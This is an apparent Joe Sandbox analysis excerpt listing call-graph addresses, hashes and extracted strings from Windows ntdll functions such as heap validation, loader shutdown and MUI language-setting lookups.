359e15e3 20865->20868 20867 359c71ed 20869 359e15fc 20868->20869 20872 35962df0 LdrInitializeThunk 20869->20872 20871 359e161a 20871->20867 20872->20871 21640 35925650 21641 35925669 21640->21641 21642 359256c3 21641->21642 21643 359807d3 RtlDebugPrintTimes 21641->21643 21646 35925702 21642->21646 21643->21642 21645 359256cf 21647 359257a5 21646->21647 21648 3592571c 21646->21648 21651 35927152 7 API calls 21647->21651 21649 359807e8 21648->21649 21650 35925727 21648->21650 21653 35980823 21649->21653 21654 359807f4 21649->21654 21652 359270e7 2 API calls 21650->21652 21655 35925730 21651->21655 21652->21655 21656 35980832 GetPEB 21653->21656 21660 3598080e RtlDebugPrintTimes 21654->21660 21668 35925796 21654->21668 21655->21656 21657 35925742 21655->21657 21655->21668 21659 35980845 21656->21659 21658 3592574e 21657->21658 21657->21659 21662 3592575f RtlDebugPrintTimes 21658->21662 21661 359f50d9 GetPEB 21659->21661 21660->21668 21664 35925780 21661->21664 21662->21664 21663 35980861 GetPEB 21665 3592578d 21663->21665 21664->21663 21664->21665 21666 359f5152 GetPEB 21665->21666 21665->21668 21667 3598088c 21666->21667 21667->21667 21668->21645 20311 359b355e 20316 3592b6c0 20311->20316 20313 359b3579 20314 359b358f 20313->20314 20315 3592b6c0 8 API calls 20313->20315 20315->20314 20317 35977eb0 20316->20317 20318 3592b6cc GetPEB 20317->20318 20319 35983834 20318->20319 20321 3592b744 20318->20321 20320 3598383c GetPEB 20319->20320 20319->20321 20320->20321 20322 3598385d GetPEB 20321->20322 20327 3592b752 20321->20327 20322->20327 20323 3592b779 GetPEB 20325 359838e4 20323->20325 20328 3592b791 20323->20328 20326 359838f5 GetPEB 20325->20326 20325->20328 20326->20328 20327->20323 20327->20325 20330 3592b79f 20327->20330 20332 35929486 20327->20332 20328->20330 20331 35983911 GetPEB 20328->20331 20330->20313 20331->20330 20334 35929492 20332->20334 20333 35929535 20333->20323 20334->20333 20335 35929524 20334->20335 20336 35929699 GetPEB 20334->20336 20335->20333 
20337 359827b2 GetPEB 20335->20337 20336->20333 20337->20333 20338 35957150 20339 35957208 2 API calls 20338->20339 20340 35957164 20339->20340 20341 35994514 RtlDebugPrintTimes 20340->20341 20342 359571a1 20340->20342 20341->20342 20873 3594b052 GetPEB 20874 3594b0c1 20873->20874 20875 3594b073 20873->20875 20875->20874 20877 3594b0cf 20875->20877 20878 3594b0f7 20877->20878 20879 3594b16c 20878->20879 20880 3594b280 7 API calls 20878->20880 20879->20874 20880->20878 20343 3599d550 20344 35953274 2 API calls 20343->20344 20345 3599d560 20344->20345 20881 3599f450 20882 3599f46a 20881->20882 20883 3599f485 20882->20883 20886 3599f540 20882->20886 20885 3599f51c 20888 3599f54c 20886->20888 20887 3599f71a 20887->20885 20888->20887 20889 3599f6fb RtlDebugPrintTimes 20888->20889 20889->20888 20346 359cb550 20348 359cb564 20346->20348 20347 359cb639 GetPEB 20349 359cb64e 20347->20349 20348->20347 20348->20349 20352 359cb597 20348->20352 20350 359cb679 GetPEB 20349->20350 20349->20352 20351 359cb693 20350->20351 20351->20352 20353 359cb6a3 GetPEB 20351->20353 20353->20352 20890 359cb450 20891 359cb47f 20890->20891 20892 359cb468 20890->20892 20894 359cb47d 20891->20894 20896 359cb48c GetPEB 20891->20896 20897 359cb4a5 GetPEB 20891->20897 20893 359cb46c GetPEB 20892->20893 20892->20894 20893->20894 20895 359cb4bc GetPEB 20894->20895 20898 359cb4cd 20894->20898 20895->20898 20896->20891 20897->20894 20899 3592b440 20900 35977e54 20899->20900 20901 3592b44f GetPEB 20900->20901 20902 35983733 20901->20902 20904 3592b48f 20901->20904 20903 3598373c GetPEB 20902->20903 20902->20904 20903->20904 20905 3598375d GetPEB 20904->20905 20909 3592b49d 20904->20909 20905->20909 20906 359837b6 20908 359837ee GetPEB 20906->20908 20910 3592b604 20906->20910 20907 3592b5e9 GetPEB 20907->20906 20907->20910 20908->20910 20909->20906 20909->20907 20911 3592b60d 20909->20911 20910->20911 20912 3598380b GetPEB 20910->20912 20912->20911 21234 35933740 21236 35933783 21234->21236 21235 359337f0 
21236->21235 21237 359337cb GetPEB 21236->21237 21238 359337e2 21237->21238 21239 359869ee 21237->21239 21238->21235 21241 35986a0a GetPEB 21238->21241 21239->21238 21240 359869f7 GetPEB 21239->21240 21240->21238 21241->21235 20354 359b3140 20357 359b3173 20354->20357 20356 359b317c 20357->20356 20359 359b3202 GetPEB 20357->20359 20360 359b31f1 GetPEB 20357->20360 20361 359b3235 20357->20361 20362 35962df0 LdrInitializeThunk 20357->20362 20358 359b32f6 GetPEB 20358->20356 20359->20357 20360->20357 20361->20356 20361->20358 20362->20357 21246 3591d34c 21250 3591d393 21246->21250 21263 3591d54b 21246->21263 21247 3591d5c0 21248 3591d5db GetPEB 21247->21248 21255 3591d5ed 21247->21255 21248->21255 21253 3591d407 21250->21253 21250->21255 21250->21263 21268 35917270 21250->21268 21251 3591d41a 21254 3591d796 4 API calls 21251->21254 21253->21251 21256 359db1e1 2 API calls 21253->21256 21253->21263 21257 3591d429 21254->21257 21256->21251 21257->21247 21257->21255 21258 3591d6aa 2 API calls 21257->21258 21257->21263 21259 3591d4e9 21258->21259 21259->21255 21260 3591d510 GetPEB 21259->21260 21259->21263 21261 3591d524 21260->21261 21261->21255 21262 3591d6aa 2 API calls 21261->21262 21262->21263 21263->21247 21264 35943342 21263->21264 21265 3594335a 21264->21265 21274 359433a5 21265->21274 21267 3594336c 21267->21247 21270 3591729a 21268->21270 21273 359172fb 21268->21273 21269 359db256 4 API calls 21271 35979f9c 21269->21271 21270->21269 21270->21273 21272 35943342 GetPEB 21271->21272 21271->21273 21272->21273 21273->21253 21275 359433be 21274->21275 21276 359433f2 GetPEB 21275->21276 21277 35943403 21275->21277 21276->21277 21277->21267 21282 35927370 21283 359275de 21282->21283 21292 359273b1 21282->21292 21284 35927627 21285 359818a3 GetPEB 21284->21285 21286 359818b6 21285->21286 21312 359f547f 21286->21312 21288 359274df 21289 35927562 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@ 21288->21289 21294 359274e6 21288->21294 21291 359275ab 21289->21291 21290 359818c2 
GetPEB 21293 359275d0 21290->21293 21291->21290 21291->21293 21292->21284 21292->21285 21292->21286 21292->21288 21293->21283 21316 359f55c9 21293->21316 21296 35927516 21294->21296 21303 35927703 21294->21303 21298 359818eb GetPEB 21296->21298 21299 35927523 21296->21299 21298->21299 21302 35927531 21299->21302 21320 359f54db 21299->21320 21301 35981905 21301->21301 21304 3592771d 21303->21304 21305 3598190a GetPEB 21304->21305 21306 35927725 21304->21306 21305->21306 21311 35927733 21306->21311 21324 359f53fc 21306->21324 21308 35981970 RtlDebugPrintTimes 21309 35981980 21308->21309 21309->21309 21310 35927877 21310->21294 21311->21308 21311->21310 21313 359f54a2 21312->21313 21314 359f54a6 GetPEB 21313->21314 21315 359f54b6 21313->21315 21314->21315 21315->21291 21317 359f55fb 21316->21317 21318 359f55ff GetPEB 21317->21318 21319 359f560f 21317->21319 21318->21319 21319->21296 21321 359f54fe 21320->21321 21322 359f5502 GetPEB 21321->21322 21323 359f5512 21321->21323 21322->21323 21323->21301 21325 359f5446 21324->21325 21326 359f544a GetPEB 21325->21326 21327 359f545a 21325->21327 21326->21327 21327->21311 21328 3593d770 21330 3593d7b1 21328->21330 21329 3593d922 21330->21329 21331 35989475 RtlDebugPrintTimes 21330->21331 21331->21329 20913 3594d070 20916 3594d090 GetPEB 20913->20916 20915 3594d082 20917 3598eec3 20916->20917 20918 3594d0af 20916->20918 20918->20917 20919 3594d0b8 GetPEB 20918->20919 20920 3594d0e1 20919->20920 20920->20915 20367 3595b570 20368 3595b5a6 20367->20368 20370 3595b5bc 20368->20370 20377 3593f720 20368->20377 20371 359973e2 GetPEB 20370->20371 20373 3595b609 20370->20373 20374 359973f0 20371->20374 20372 35997443 GetPEB 20372->20373 20374->20372 20385 3594d7b0 20374->20385 20376 3599743b 20376->20372 20378 35977e54 20377->20378 20379 3593f72c GetPEB 20378->20379 20382 3593f74c 20379->20382 20380 3593f8d7 20381 35989e69 GetPEB 20380->20381 20384 3593f8e4 20380->20384 20381->20384 20382->20380 20383 3593f925 GetPEB 20382->20383 
20383->20380 20384->20370 20386 3594d7bc 20385->20386 20387 3594d93d RtlDebugPrintTimes 20386->20387 20389 3594d8e0 20386->20389 20390 3594d818 20386->20390 20387->20390 20388 3594d8cd GetPEB 20388->20389 20389->20376 20390->20388 20391 3596f170 20393 3596f17d 20391->20393 20392 3596f04e __aulldvrm 20394 3596f1a1 20392->20394 20393->20392 21336 359c3370 21337 359c3387 21336->21337 21338 359c33a2 21336->21338 21339 3594340d GetPEB 21338->21339 21340 359c33b4 21339->21340 21341 3594340d GetPEB 21340->21341 21342 359c33c6 21341->21342 21343 359c33d8 GetPEB 21342->21343 21343->21337 21673 35919660 21674 3591967c 21673->21674 21676 359196b1 21674->21676 21677 359196db 21674->21677 21678 359196ed 21677->21678 21680 35919714 21678->21680 21681 35919730 21678->21681 21680->21676 21682 35919745 21681->21682 21683 35919759 GetPEB 21682->21683 21686 3591976a 21682->21686 21683->21686 21684 3597bca6 GetPEB 21685 359197e4 21684->21685 21685->21678 21686->21684 21686->21685 20925 35921460 20933 3592147e 20925->20933 20935 359214e0 20925->20935 20926 3591f626 10 API calls 20926->20933 20927 3592176b 20929 3591f172 31 API calls 20927->20929 20928 35921586 GetPEB 20930 35921702 GetPEB 20928->20930 20928->20933 20929->20935 20930->20933 20931 35921605 GetPEB 20931->20933 20932 359217bd GetPEB 20932->20933 20933->20926 20933->20927 20933->20928 20933->20931 20933->20932 20934 35921732 GetPEB 20933->20934 20933->20935 20934->20933 20398 359fb16b 20399 359fb190 20398->20399 20400 359fb314 RtlDebugPrintTimes 20399->20400 20401 359fb2ef 20399->20401 20405 359fb331 20400->20405 20402 359fb412 20402->20401 20403 359fb5fc RtlDebugPrintTimes 20402->20403 20403->20401 20404 359fb474 RtlDebugPrintTimes 20407 359fb487 20404->20407 20405->20401 20405->20402 20405->20404 20406 359fb587 RtlDebugPrintTimes 20406->20402 20407->20402 20407->20406 20936 359a106e GetPEB 20937 359a10aa 20936->20937 20938 359a1099 20936->20938 20940 35921090 20938->20940 20941 359210a8 20940->20941 20942 359210d5 
RtlDebugPrintTimes 20941->20942 20943 359210ba 20941->20943 20942->20943 20943->20937 21687 35959660 21688 3595966f 21687->21688 21689 35995faa GetPEB 21688->21689 21690 35959677 21688->21690 21689->21690 21691 359596ba 21690->21691 21696 3591b765 21690->21696 21693 359596e7 GetPEB 21691->21693 21695 35995ffc 21691->21695 21694 359596f8 21693->21694 21697 3591b771 21696->21697 21698 3591b7a3 GetPEB 21697->21698 21699 35933ca0 21698->21699 21700 3591b7bf GetPEB 21699->21700 21701 35933ca0 21700->21701 21702 3591b7db GetPEB 21701->21702 21704 3591b7f7 21702->21704 21703 3591b85f 21704->21703 21705 3591b82a GetPEB 21704->21705 21706 3591b844 21705->21706 21706->21691 21344 359af760 21345 359af770 21344->21345 21346 359af782 21344->21346 21345->21346 21347 35929486 2 API calls 21345->21347 21347->21346 21707 359bd660 21710 359bd672 21707->21710 21708 359bd676 21709 359bd6bb GetPEB 21709->21710 21710->21708 21710->21709 20948 3593f06d 20949 3593f085 20948->20949 20951 3593f13f 20949->20951 20952 35941412 20949->20952 20959 3594121f 20952->20959 20954 35941547 20954->20951 20955 35941427 20955->20954 20963 359415f4 20955->20963 20957 35941525 20957->20954 20977 359415a9 20957->20977 20960 3594123f 20959->20960 20962 359412d3 20960->20962 20989 359b72a0 20960->20989 20962->20955 20964 3594161e 20963->20964 20965 3598a5bb GetPEB 20964->20965 20966 35941678 20964->20966 20975 3594165c 20964->20975 20967 3598a5ce GetPEB 20965->20967 20966->20967 20969 3594168b 20966->20969 20968 3598a5e1 20967->20968 20967->20969 20968->20969 20970 3598a5ea GetPEB 20968->20970 20971 359416c6 20969->20971 20972 3598a635 GetPEB 20969->20972 20969->20975 20970->20969 20973 3598a648 GetPEB 20971->20973 20971->20975 20972->20973 20974 3598a65b 20973->20974 20973->20975 20974->20975 20976 3598a664 GetPEB 20974->20976 20975->20957 20976->20975 20978 359415bc 20977->20978 20979 3598a499 GetPEB 20978->20979 20980 359415c9 20978->20980 20979->20980 20983 359415d9 20980->20983 20984 3598a4b5 GetPEB 
20980->20984 20981 359415e6 20985 3598a4e5 GetPEB 20981->20985 20987 359415ef 20981->20987 20982 3598a4d1 GetPEB 20982->20985 20983->20981 20983->20982 20983->20987 20984->20983 20986 3598a4f8 20985->20986 20985->20987 20986->20987 20988 3598a501 GetPEB 20986->20988 20987->20954 20988->20987 20991 359b72b8 20989->20991 20990 359b72f0 GetPEB 20992 359b7302 20990->20992 20991->20990 20991->20992 20993 359b7309 GetPEB 20992->20993 20994 359b7319 20993->20994 20994->20962

                                                          Control-flow Graph

                                                          control_flow_graph 1 359635c0-359635cc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e51632cab30350cbb4cf8346960018dd439f3e22e24f671b3252c1904115022c
                                                          • Instruction ID: 8bce4fc2442dcc1b5d25b6f0e2085c6ad2b1d0fce0f452f141d8ab1bb554ee93
                                                          • Opcode Fuzzy Hash: e51632cab30350cbb4cf8346960018dd439f3e22e24f671b3252c1904115022c
                                                          • Instruction Fuzzy Hash: 27900232605A0402D1047158451870610194BD0201FA5C4A3A0424528DC7998A5565A2

                                                          Control-flow Graph

                                                          control_flow_graph 0 35962df0-35962dfc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 84a37b5ddd9d315022bd70b943bbc3efd3f96b2693cdd9138f0fa0ac1ad97700
                                                          • Instruction ID: 4b5a8c86b0907afc9153f2205724e8fff3677d5fcdab8880de2b1a69ef9d8888
                                                          • Opcode Fuzzy Hash: 84a37b5ddd9d315022bd70b943bbc3efd3f96b2693cdd9138f0fa0ac1ad97700
                                                          • Instruction Fuzzy Hash: FE90023220190413D11571584508707001D4BD0241FD5C4A3A0424518DD65A8A56A121

                                                          Control-flow Graph

                                                          control_flow_graph 2 359c94e0-359c9529 [basic-block and edge list omitted as graph residue; the blocks of this function call into 35969020, 35964c30, 359c9d2a, 359e972b, 359cdc65, 359ca808 and 359c8513 and invoke GetPEB and RtlDebugPrintTimes]
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $ $0
                                                          • API String ID: 3446177414-3352262554
                                                          • Opcode ID: 9c3b12ebbf37b7f7537061ff775418f3cdba84e88978f404e45a49c1bdea1c22
                                                          • Instruction ID: 2a17cafe817463cabb465590ccb5af3460cc349710e105473758d8d712fab87a
                                                          • Opcode Fuzzy Hash: 9c3b12ebbf37b7f7537061ff775418f3cdba84e88978f404e45a49c1bdea1c22
                                                          • Instruction Fuzzy Hash: BA3203B16083818FE350CF68C984B5BFBF9BB88344F04496DF59987290DBB5E949CB52

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          [Control-flow graph rendering for the function starting at 359cf525 omitted; the per-block node and edge listing is not reproduced here.]
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                          • API String ID: 3446177414-1745908468
                                                          • Opcode ID: 30dd031d339394eacdcb3631f5a2885e476e55b0f0b61301299ced5316bee335
                                                          • Instruction ID: 8f3c3a13d1b1f64e38a894f5371523700162300cfd28bd0a0c0d3bce63b34da0
                                                          • Opcode Fuzzy Hash: 30dd031d339394eacdcb3631f5a2885e476e55b0f0b61301299ced5316bee335
                                                          • Instruction Fuzzy Hash: 14910475A04749DFDB11CFA8C440AADBBF2FF49314F158099E446AB262CB35AA81CF11
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                          • API String ID: 0-3591852110
                                                          • Opcode ID: 369c9827d565165374bf56be9583b30626a82f3da26351e35e3fecda27313fa7
                                                          • Instruction ID: 76faa5a7347f9d3a0ca2c1b43853c35a494e6b6827f9284185007d5074815bf1
                                                          • Opcode Fuzzy Hash: 369c9827d565165374bf56be9583b30626a82f3da26351e35e3fecda27313fa7
                                                          • Instruction Fuzzy Hash: 9812AA7A604686DFE725CF24C440BAAFBF6FF09344F44C459E8868B652D738E981EB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          [Control-flow graph rendering for the function starting at 3591d34c omitted; the per-block node and edge listing is not reproduced here.]
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                          • API String ID: 0-3532704233
                                                          • Opcode ID: 8f1fc0f0ff051b5e343e2141d53e6c1ef45e803f5aaa3d1589e5d5a19cb644ae
                                                          • Instruction ID: b3a1ba5259f0111220ced1bc4f22d922a6870bc9592f2be84d25f37b17e9bfb5
                                                          • Opcode Fuzzy Hash: 8f1fc0f0ff051b5e343e2141d53e6c1ef45e803f5aaa3d1589e5d5a19cb644ae
                                                          • Instruction Fuzzy Hash: 4DB19AB25083699FD711CF24C480A5BB7E8BF88794F42492EFC89D7250D774EA08CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 3446177414-3570731704
                                                          • Opcode ID: af46afa72ce77037ac3e77eef6c29a7852bc43447f95c8287c4669f2ddb842ad
                                                          • Instruction ID: ff055bff5987df6fa7da5bbb663d2ce89fe856463b59e03212384dce0cfca0c1
                                                          • Opcode Fuzzy Hash: af46afa72ce77037ac3e77eef6c29a7852bc43447f95c8287c4669f2ddb842ad
                                                          • Instruction Fuzzy Hash: 7B927975A05368CFEB20CF18C881F99B7BABF48350F0581EAD849AB251DB749E84CF51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          [Control-flow graph rendering for the function starting at 3594d7b0 omitted; the per-block node and edge listing is not reproduced here.]
                                                          APIs
                                                          • RtlDebugPrintTimes.NTDLL ref: 3594D959
                                                            • Part of subcall function 35924859: RtlDebugPrintTimes.NTDLL ref: 359248F7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-1975516107
                                                          • Opcode ID: 59a29d0c0acf179b3b0aff1fe991f2605e0ac450a829d00537bedbbeea679ca0
                                                          • Instruction ID: 220ef037ff0992403672dfbd83d8394b895dac9b30cba7ac76ba405387af60af
                                                          • Opcode Fuzzy Hash: 59a29d0c0acf179b3b0aff1fe991f2605e0ac450a829d00537bedbbeea679ca0
                                                          • Instruction Fuzzy Hash: E651DFB9A04345DFDB10CFA8D580B9DBBB2BF48354F164159D801AB381DB78AD86DF90

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          [Control-flow graph rendering for the function starting at 359b9179 omitted; the per-block node and edge listing is not reproduced here.]
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                          • API String ID: 0-3063724069
                                                          • Opcode ID: 8b51df130299121f7dc7f8925dac455c3eef6ad386b06bc9a86705a860ad8fd7
                                                          • Instruction ID: 2887cd3a64dc9b07defea50ef988f5d5723fb82b6649737508e4cc70d168f607
                                                          • Opcode Fuzzy Hash: 8b51df130299121f7dc7f8925dac455c3eef6ad386b06bc9a86705a860ad8fd7
                                                          • Instruction Fuzzy Hash: 63D1F3B2919315AFEB21CB60C840B6BB7FCAF88754F400A2DF98497251D7B4DD48CB92

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          [Control-flow graph rendering for the function starting at 3591d08d omitted; the per-block node and edge listing is not reproduced here.]
                                                          Strings
                                                          • @, xrefs: 3591D0FD
                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3591D262
                                                          • @, xrefs: 3591D2AF
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3591D2C3
                                                          • @, xrefs: 3591D313
                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3591D146
                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 3591D196
                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3591D0CF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                          • API String ID: 0-1356375266
                                                          • Opcode ID: 78f773175e306f867d6e46e85bba257139b6ad7791c02afaf664a09b147b75cd
                                                          • Instruction ID: 11ef69919fe0bcf338f73c1da92d4959b2e7fd87e1960933694cd364132eba5a
                                                          • Opcode Fuzzy Hash: 78f773175e306f867d6e46e85bba257139b6ad7791c02afaf664a09b147b75cd
                                                          • Instruction Fuzzy Hash: BDA16E719083599FE321CF20C580B9BB7E8FF84769F414D2EE99896241D775DA08CF92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-523794902
                                                          • Opcode ID: 0d8c88f55e014dd51dbed6fadcbce42aeb04a7d0eb14914daaba514419b7b8f4
                                                          • Instruction ID: 84799e15176f9bf9878320b841b7d5c36b2112a8ce742786221f1b774cb8b04e
                                                          • Opcode Fuzzy Hash: 0d8c88f55e014dd51dbed6fadcbce42aeb04a7d0eb14914daaba514419b7b8f4
                                                          • Instruction Fuzzy Hash: 2E42D2752087499FD315CF38C884A2ABBE5FF88344F14496EE896CB352DB34EA45CB61
                                                          Strings
                                                          Memory Dump Source
